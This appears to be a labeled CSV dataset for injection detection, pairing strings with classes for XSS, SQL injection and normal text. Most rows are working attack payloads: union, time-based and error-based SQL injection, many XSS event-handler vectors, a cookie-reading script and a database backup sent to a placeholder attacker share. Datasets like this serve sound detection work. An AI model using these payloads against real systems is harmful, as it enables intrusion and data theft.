dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,13960 "<nobr onmousemove=""alert(1)"">test</nobr>",1,XSS,7942 "select * from users where id = '1' union select ( \ ) ,@@VERSION -- 1'",2,SQLi,16129 "1%' ) ) union all select null,null,null,null,null,null#",2,SQLi,17811 "select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( '%' = '",2,SQLi,13556 <abbr onpointerenter=alert(1)>XSS</abbr>,1,XSS,8030 Sort results where applicable.,3,normal,23290 1 ) where 4711 = 4711,2,SQLi,21709 1 ) ) as fpej where 6790 = 6790 and ( 3020 = 3020 ) *6703--,2,SQLi,17314 <p onpointerleave=alert(1)>XSS</p>,1,XSS,9231 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i",2,SQLi,11909 "<div draggable=""true"" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable>drop here</colgroup>",1,XSS,762 "<style>:target {color: red;}</style><meta id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></meta>",1,XSS,988 "1 ) ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 1164 = 1164",2,SQLi,12638 1' or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ),2,SQLi,17810 "<div id=""dropbox"" style=""height: 360px;width: 500px;border: 5px solid #000;position: relative;"" ondragover=""event.preventDefault()"">+ Drop Box +</div>//[""'`-->]]>]</div>",1,XSS,326 1 ) ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,17947 Select a class to enhance your skills.,3,normal,23991 "-5513"" ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""ovmk"" like ""ovmk",2,SQLi,10269 "-1908"" ) where 6420 = 6420 union all select 6420,6420,6420,6420--",2,SQLi,16703 "1'|| ( select 'xyrk' from dual where 9844 = 9844 and 9254 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,11759 "1%' ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( '%' = '",2,SQLi,13054 "<style>@keyframes x{}</style><s style=""animation-name:x"" onanimationstart=""alert(1)""></s>",1,XSS,1787 "<script onpaste=""alert(1)"" contenteditable>test</script>",1,XSS,4384 1 where 1299 = 1299,2,SQLi,21937 <iframe src=javascript:alert(1)>,1,XSS,9479 Select the best solution.,3,normal,24277 "1' in boolean mode ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12670 "1'+ ( select ugvj where 2593 = 2593 union all select null,null,null,null,null#",2,SQLi,15345 select ( case when ( 5569 = 9390 ) then 5569 else 1/ ( select 0 ) end ) --,2,SQLi,15722 "1'|| ( select 'iocs' where 9287 = 9287 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) ||'",2,SQLi,13449 select * from users where id = 1 + $+%1 or 1 = 1 -- 1,2,SQLi,18050 "1'|| ( select 'cjwx' from dual where 7637 = 7637 and elt ( 9548 = 3991,3991 ) ) ||'",2,SQLi,15036 "-5130' ) ) union all select 5218,5218,5218,5218,5218,5218,5218,5218,5218,5218--",2,SQLi,15258 "-1600%"" ) ) ) or elt ( 4568 = 7693,7693 ) and ( ( ( ""%"" = """,2,SQLi,17278 <table onpointerenter=alert(1)>XSS</table>,1,XSS,7410 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28",2,SQLi,12568 <iframe/%00/ src=javaSCRIPT&colon;alert(1),1,XSS,7316 "<svg><path><animateMotion onbegin=alert(1) dur=""1s"" repeatCount=""1"">",1,XSS,2650 <ul id=x tabindex=1 ondeactivate=alert(1)></ul><input id=y autofocus>,1,XSS,2588 "1' ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( 'xkxi' like 'xkxi",2,SQLi,14352 "1 ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( 7984 = 7984",2,SQLi,11033 "<picture onbeforecut=""alert(1)"" contenteditable>test</picture>",1,XSS,3184 "1' ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11696 <optgroup id=x tabindex=1 onfocus=alert(1)></optgroup>,1,XSS,4805 "<? echo('<scr)'; echo('ipt>alert(\""XSS\"")</script>'); ?>",1,XSS,4220 <form><button formaction=javascript:alert(1)>click,1,XSS,5694 "But I'm unable to select ""Exit Game"" from the menu with the gamepad — I can only select it by tapping on my phone screen.",3,normal,26314 -5250 ) where 1591 = 1591 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12803 "<s onmouseout=""alert(1)"">test</s>",1,XSS,9374 "1' ) ) as jvwq where 6596 = 6596 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13615 <shadow onpointerout=alert(1)>XSS</shadow>,1,XSS,7381 "<iframe style=""xg-p:absolute;top:0;left:0;width:100%;height:100%"" onmouseover=""prompt(1)"">",1,XSS,1756 Select the best.,3,normal,24790 "1%"" ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ""%"" = """,2,SQLi,10562 "<nobr oncopy=""alert(1)"" contenteditable>test</nobr>",1,XSS,5374 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#",2,SQLi,15569 "select pg_sleep ( 5 ) and ""%"" = """,2,SQLi,20203 "<style>@keyframes x{}</style><tfoot style=""animation-name:x"" onanimationend=""alert(1)""></tfoot>",1,XSS,1615 "<frameset onmouseleave=""alert(1)"">test</frameset>",1,XSS,5831 "-2226%"" ) ) union all select 1018,1018,1018,1018--",2,SQLi,18445 "The service was available only to users who subscribed to Ola's ""Select"" plan, which according to the company ""saw hundreds of thousands of new users opt for Select subscription, resulting in 3x growth"".",3,normal,25380 select * from users where id = 1 <@$ or 1 = 1 -- 1,2,SQLi,18429 "<a href=""\xE2\x80\x82javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2017 "1"" ) where 9115 = 9115",2,SQLi,21487 "{""id"":null,""name"":""Marsh Frog""}",3,normal,27261 Join the hike.,3,normal,22821 <span id=x tabindex=1 onactivate=alert(1)></span>,1,XSS,5758 """'-function(){{{callback}}}()-"">\""><scrIpt>{callback}</scrIpt><aUdio src=x oNerror={callback}><""-'-function(){{{callback}}}()""'''",1,XSS,605 "`""'><img src=xxx:x onerror\x20=javascript:alert(1)>",1,XSS,5331 Plant some succulents.,3,normal,22603 "&lt;t&#58;set attributeName=\""innerHTML\"" to=\""XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\""&gt;",1,XSS,867 1%' ) ) rlike sleep ( 5 ) #,2,SQLi,20920 ")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND (('1337'='1337",2,SQLi,16651 "-8875"" ) where 8428 = 8428 or 1519 = 5756--",2,SQLi,19231 ", begin declare @var varchar ( 8000 ) set @var = ' ...",2,SQLi,17927 Join the tour.,3,normal,22877 "-6436' in boolean mode ) union all select 7589,7589,7589,7589--",2,SQLi,16889 "Customers can also select ""Mx."" in lieu of Ms., Mrs.",3,normal,26260 "1 where 1062 = 1062 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11244 "<source oncut=""alert(1)"" contenteditable>test</source>",1,XSS,4832 1' ) and 7533 = 7533 and ( 'dbjq' = 'dbjq,2,SQLi,19378 "<script language=""JavaScript"">alert('XSS')</script>",1,XSS,5346 "Under the title of Select Scottish Ballads he reprinted in 1783 his tragic ballads, with a supplement comprising Ballads of the Comic Kind.",3,normal,25231 "1' in boolean mode ) union all select null,null,null,null,null,null,null,null#",2,SQLi,15340  or 3 = 3 --,2,SQLi,22265 "1' or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'eomt' = 'eomt",2,SQLi,12821 "-6097%' ) ) union all select 3990,3990,3990,3990,3990,3990--",2,SQLi,17181 "select * from users where id = 1 or ( $+ ) = 1 union select 1,@@VERSION -- 1",2,SQLi,15479 "1"" where 7599 = 7599",2,SQLi,21815 "<button onkeydown=""alert(1)"" contenteditable>test</button>",1,XSS,3875 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></center>",1,XSS,181 "-2325 ) union all select 4692,4692,4692,4692#",2,SQLi,19019 "<head oncontextmenu=""alert(1)"">test</head>",1,XSS,7439 1'|| ( select 'yyil' from dual where 3121 = 3121,2,SQLi,18775 "<isindex oncontextmenu=""alert(1)"">test</isindex>",1,XSS,5960 "1' ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'cssb' = 'cssb",2,SQLi,14134 "<meta content=""&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)"" http-equiv=""refresh""/>",1,XSS,1802 -7941 or ( 5822 = 8754 ) *8754-- eepn,2,SQLi,19810 "1' in boolean mode ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) #",2,SQLi,14672 "1 where 4944 = 4944 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,15106 "<rp onpaste=""alert(1)"" contenteditable>test</rp>",1,XSS,6040 <code onpointermove=alert(1)>XSS</code>,1,XSS,8224 Always try to select the appropriate newsgroup for your article.,3,normal,26387 "1' ) ) as cbka where 3176 = 3176 and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13919 "<noframes draggable=""true"" ondragleave=""alert(1)"">test</noframes>",1,XSS,2803 1'|| ( select 'aojt' from dual where 8499 = 8499,2,SQLi,18710 "<img usemap=#x><map name=""x""><area href onfocusin=alert(1) id=x>",1,XSS,2924 Select the best method.,3,normal,24303 "1"" ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ""liar"" = ""liar",2,SQLi,12880 atan2,3,normal,23223 "<div draggable=""true"" contenteditable>drag me</div><td ondragover=alert(1) contenteditable>drop here</td>",1,XSS,1247 Select a book for your leisure time.,3,normal,24161 "<time draggable=""true"" ondragleave=""alert(1)"">test</time>",1,XSS,4055 <frameset onpointerenter=alert(1)>XSS</frameset>,1,XSS,5933 "<summary onbeforecut=""alert(1)"" contenteditable>test</summary>",1,XSS,3241 <script>Object.prototype.preventDefault='x'; Object.prototype.handleObj='x'; Object.prototype.delegateTarget='<img/src/onerror=alert(1)>'; /* No extra code needed for jQuery 1 & 2 */$(document).off('foobar');</script>,1,XSS,110 "1"" ) as ronb where 9368 = 9368",2,SQLi,20586 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) and ( 'pgth' = 'pgth,2,SQLi,16174 select current_setting('config_file');,2,SQLi,19790 1' ) as svtm where 7627 = 7627 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --,2,SQLi,14752 "1"" ) ) ) union all select null,null,null,null#",2,SQLi,18939 "1"" ) ) as gvpm where 5170 = 5170 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11343 select current_setting('password_encryption');,2,SQLi,18984 <u onfocusout=alert(1) tabindex=1 id=x></u><input autofocus>,1,XSS,3536 "<aside onkeydown=""alert(1)"" contenteditable>test</aside>",1,XSS,4396 "1' ) as keom where 7524 = 7524 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11354 1 ) as fxfe where 1148 = 1148 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,14990 Toggle the active button to select which of the layers can be queried or data selected using the tools on the toolbar.,3,normal,25243 "select * from users where id = 1 or ""_ ) "" or 1 = 1 -- 1",2,SQLi,17589 <q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus>,1,XSS,3569 "1' and make_set ( 3445 = 5963,5963 ) and 'wjfw' = 'wjfw",2,SQLi,17755 "<image onmouseover=""alert(1)"">test</image>",1,XSS,7436 "1' where 2964 = 2964 union all select null,null,null#",2,SQLi,18119 "{""id"":null,""firstName"":""Kingsroad"",""lastName"":""Myxzy"",""address"":""146 EAST FIRST AVE, WILLIAMSON WV 25661"",""city"":""135"",""telephone"":""4732701429""}",3,normal,26824 "1' ) ) as jmnw where 6496 = 6496 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11341 "<a onbeforecut=""alert(1)"" contenteditable>test</a>",1,XSS,5496 Select agree.,3,normal,24579 "1' ) as jysm where 8961 = 8961 union all select null,null#",2,SQLi,17381 "<nav onbeforepaste=""alert(1)"" contenteditable>test</nav>",1,XSS,4301 "1 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17954 "<command oncontextmenu=""alert(1)"">test</command>",1,XSS,5874 "<audio onkeyup=""alert(1)"" contenteditable>test</audio>",1,XSS,4840 %253cscript%253ealert(1)%253c/script%253e,1,XSS,7601 "<style>@keyframes x{}</style><a style=""animation-name:x"" onanimationstart=""alert(1)""></a>",1,XSS,1791 -4191 ) order by 1#,2,SQLi,21942 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual-- vykx",2,SQLi,13763 "1 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) -- lxey",2,SQLi,13686 <hgroup onpointerdown=alert(1)>XSS</hgroup>,1,XSS,7198 Create a captivating story about your travels.,3,normal,22904 "-2248'+ ( select wuow where 4421 = 4421 union all select 4421,4421,4421,4421,4421,4421--",2,SQLi,14770 <svg><noscript onload=alert(1)></noscript>,1,XSS,7467 "<rp onmouseup=""alert(1)"">test</rp>",1,XSS,9233 Where's the SQL documentation?,3,normal,23414 <address onpointerleave=alert(1)>XSS</address>,1,XSS,6332 "<div id=""54""><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>//[""'`-->]]>]</div><div id=""55""><video><source onerror=""alert(55)"">//[""'`-->]]>]</div><div id=""56""><video onerror=""alert(56)""><source></source></video>//[""'`-->]]>]</div><div id=""57""><b <script>alert(57)//</script>0</script></b>//[""'`-->]]>]</div><div id=""58""><b><script<b></b><alert(58)</script </b></b>//[""'`-->]]>]</div><div id=""59""><div id=""div1""><input value=""``onmouseover=alert(59)""></div> <div id=""div2""></div><script>document.getElementById(""div2"").innerHTML = document.getElementById(""div1"").innerHTML;</script>//[""'`-->]]>]</div><div id=""60""><div style=""[a]color[b]:[c]red"">XXX</div>//[""'`-->]]>]</div>",1,XSS,12 "1' ) where 3579 = 3579 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) --",2,SQLi,10863 "<frameset onmouseover=""alert(1)"">test</frameset>",1,XSS,5870 "<td onmousemove=""alert(1)"">test</td>",1,XSS,8858 Select mark.,3,normal,24667 "1"" ) as yggn where 1006 = 1006 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) --",2,SQLi,11481 She'll select her shoes.,3,normal,24346 1'+ ( select 'diet' where 7004 = 7004 rlike sleep ( 5 ) ) +',2,SQLi,17188 1' ) as nexa where 6740 = 6740,2,SQLi,20559 1 where 4091 = 4091,2,SQLi,22005 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A,2,SQLi,15486 "1' ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( 'fdoc' like 'fdoc",2,SQLi,10609 1' ) where 2208 = 2208 rlike sleep ( 5 ) #,2,SQLi,19267 "<video onclick=""alert(1)"">test</video>",1,XSS,8518 "<div draggable=""true"" contenteditable>drag me</div><svg ondrop=alert(1) contenteditable>drop here</svg>",1,XSS,1346 "<style>@keyframes slidein {}</style><track style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></track>",1,XSS,374 """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,15830 "<div draggable=""true"" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script>",1,XSS,911 "1"" ) ) as bovm where 5560 = 5560 union all select null,null,null,null,null,null,null#",2,SQLi,14939 "-9622' union all select 7208,7208,7208,7208#",2,SQLi,19081 "union select * from users where login = char(114,111,111,116);",2,SQLi,16904 1 ) where 9167 = 9167,2,SQLi,21655 1' ) ) as zari where 6847 = 6847,2,SQLi,20316 "1%"" ) ) ) and elt ( 4249 = 4249,7259 ) and ( ( ( ""%"" = """,2,SQLi,17714 "-4330' union all select 3059,3059,3059,3059,3059,3059,3059,3059,3059--",2,SQLi,16234 "1%"" ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11686 "-6305"" ) ) ) or 8097 = 2048 and ( ( ( ""euyy"" like ""euyy",2,SQLi,17792 "1, ( select ( case when ( 3902 = 3902 ) then ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) else 1/ ( select 0 from dual ) end ) from dual )",2,SQLi,11439 "<div draggable=""true"" contenteditable>drag me</div><br ondragover=alert(1) contenteditable>drop here</br>",1,XSS,1246 "<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">",1,XSS,1197 "<IMG SRC=x ontimeupdate=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2992 select ( case when ( 4624 = 4844 ) then 4624 else 1/ ( select 0 ) end ) --,2,SQLi,15728 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></div>",1,XSS,258 "-4091 ) ) as lqqy where 3030 = 3030 union all select 3030,3030,3030#",2,SQLi,16389 "<svg onmouseleave=""alert(1)"">test</svg>",1,XSS,8208 "Making your own cover is a great way to truly personalize your child's car seat, since you can select the fabric yourself.",3,normal,25899 "1"" ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( ""pnsz"" like ""pnsz",2,SQLi,14793 1 ) ) as goar where 2405 = 2405 and 5927 = 9731--,2,SQLi,18567 "{""id"":null,""name"":""GardevoirMega Gardevoir""}",3,normal,27368 "Select both objects Specify rollover settings To test the behavior of the rollover button, hover your mouse over the Preview window.",3,normal,25646 youtube. com / watch? v = rBrx9D … - New GTA Line 5 Top Content - if you felt like discovering any new business tactics and strategies! Click for the Link and Select Like the Video! Much I Love More and Thank You my guys! Book 100,3,normal,25057 "1%' union all select null,null,null,null,null,null,null#",2,SQLi,17640 "-8358' ) ) ) union all select 7282,7282--",2,SQLi,19418 <details id=x tabindex=1 onfocusin=alert(1)></details>,1,XSS,4786 "1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,13687 "<SCRIPT/ SRC=""http://.rocks/.js""></SCRIPT>",1,XSS,7525 "<script>$=1,\u0061lert($)</script>",1,XSS,9307 "1%' ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15894 1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'clcf' = 'clcf,2,SQLi,17819 1' ) as mpsf where 3348 = 3348,2,SQLi,20535 <noframes onpointerenter=alert(1)>XSS</noframes>,1,XSS,5914 Select love.,3,normal,24744 "call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 'cixa' like 'cixa",2,SQLi,13910 1 rlike sleep ( 5 ) #,2,SQLi,21610 "{""id"":null,""name"":""check""}",3,normal,26871 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#",2,SQLi,16354 1 where 3357 = 3357 and ( 9492 = 4334 ) *4334--,2,SQLi,18850 "A continuation of it, containing selected works of the Nicene and post-Nicene period, was edited by Schaff and others under the title A Select Library of Nicene and post-Nicene Fathers (series 1 and 2; 28 vols., Buffalo and New York, 1886 ff.).",3,normal,26444 "><script+src=https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)""></script>",1,XSS,1381 "<meta onmouseleave=""alert(1)"">test</meta>",1,XSS,7692 <applet id=x tabindex=1 onbeforeactivate=alert(1)></applet>,1,XSS,3690 select case when 9848 = 2618 then 1 else null end--,2,SQLi,18341 "If these insects select only full grown caterpillars, I can scarcely imagine one of the smaller individuals managing these unwieldy bodies.",3,normal,26058 BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat',2,SQLi,15683 "<input/onmouseover=""javaSCRIPT&colon;confirm&lpar;1&rpar;""",1,XSS,3792 <map onpointerout=alert(1)>XSS</map>,1,XSS,8815 "-5344"" union all select 9482,9482,9482,9482,9482,9482,9482,9482,9482--",2,SQLi,16206 "<style>:target {transform: rotate(180deg);}</style><menu id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></menu>",1,XSS,654 "All About Nina, costarring Common, opens in select theaters Sept. 28.",3,normal,26397 "1%"" ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11689 "select * from users where id = 1 or "".{"" or 1 = 1 -- 1",2,SQLi,17924 "`""'><img src=xxx:x onerror\x0D=javascript:alert(1)>",1,XSS,5330 <strong onpointerdown=alert(1)>XSS</strong>,1,XSS,7222 Please select an option.,3,normal,24314 "1' and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'cdgm' like 'cdgm",2,SQLi,11186 <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>,1,XSS,14 "<frameset onmouseout=""alert(1)"">test</frameset>",1,XSS,6154 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,11687 "<progress draggable=""true"" ondragenter=""alert(1)"">test</progress>",1,XSS,2812 "<plaintext draggable=""true"" ondragleave=""alert(1)"">test</plaintext>",1,XSS,2691 "1"" ) where 4739 = 4739 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11185 "1"" or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13502 "1"" ) ) as dksq where 7161 = 7161",2,SQLi,20286 "1%"" ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ""%"" = """,2,SQLi,12640 &#x003c;,1,XSS,9861 1 ) where 4992 = 4992,2,SQLi,21682 "1"" ) where 2136 = 2136 or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,12387 Select your disagreement.,3,normal,24916 "<style>@keyframes x{}</style><xss style=""animation-name:x"" onwebkitanimationend=""alert(1)""></xss>",1,XSS,1508 "<applet draggable=""true"" ondrag=""alert(1)"">test</applet>",1,XSS,4368 -5352%' ) ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( '%' = ',2,SQLi,10612 "1"" or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ""bkoq"" = ""bkoq",2,SQLi,14416 <option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus>,1,XSS,2132 "<style>@keyframes x{}</style><pre style=""animation-name:x"" onanimationstart=""alert(1)""></pre>",1,XSS,1650 "select count ( * ) from generate_series ( 1,5000000 ) and ""xcjt"" = ""xcjt",2,SQLi,15952 "1 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) # igen",2,SQLi,17138 "<img\x32src=x onerror=""javascript:alert(1)"">",1,XSS,6769 1 or pg_sleep(__TIME__)--,2,SQLi,21025 "<nobr draggable=""true"" ondragstart=""alert(1)"">test</nobr>",1,XSS,4146 "<bdi onmouseenter=""alert(1)"">test</bdi>",1,XSS,8204 "J. Crew: Take 5003 percent off select styles, through November 2127.",3,normal,25940 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",2,SQLi,14854 -2733' ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( 'btjx' = 'btjx,2,SQLi,9961 select ( case when ( 6179 = 8476 ) then 6179 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13627 Save up to 30% off select Men's Skincare & Grooming Products,3,normal,25724 "1' ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( 'cimm' like 'cimm",2,SQLi,12621 ) or '1'='1'/*,2,SQLi,22185 1'+ ( select brgo where 9100 = 9100 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --,2,SQLi,14987 "Since you're using object-specific overprint options, be sure to select the Preserve Document overprint options, be sure to select the Preserve Document Overprints option.",3,normal,25548 select action for Chris.,3,normal,25656 "<style>@keyframes x{}</style><strike style=""animation-name:x"" onanimationend=""alert(1)""></strike>",1,XSS,1545 "1%"" or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12144 """,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,17564 You will be asked to confirm deletion - be brave - select the YES button!,3,normal,25065 """a"""" or 3 = 3--""",2,SQLi,22136 "1'+ ( select 'zirh' where 9054 = 9054 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) +'",2,SQLi,14432 "1 ) ) as dhge where 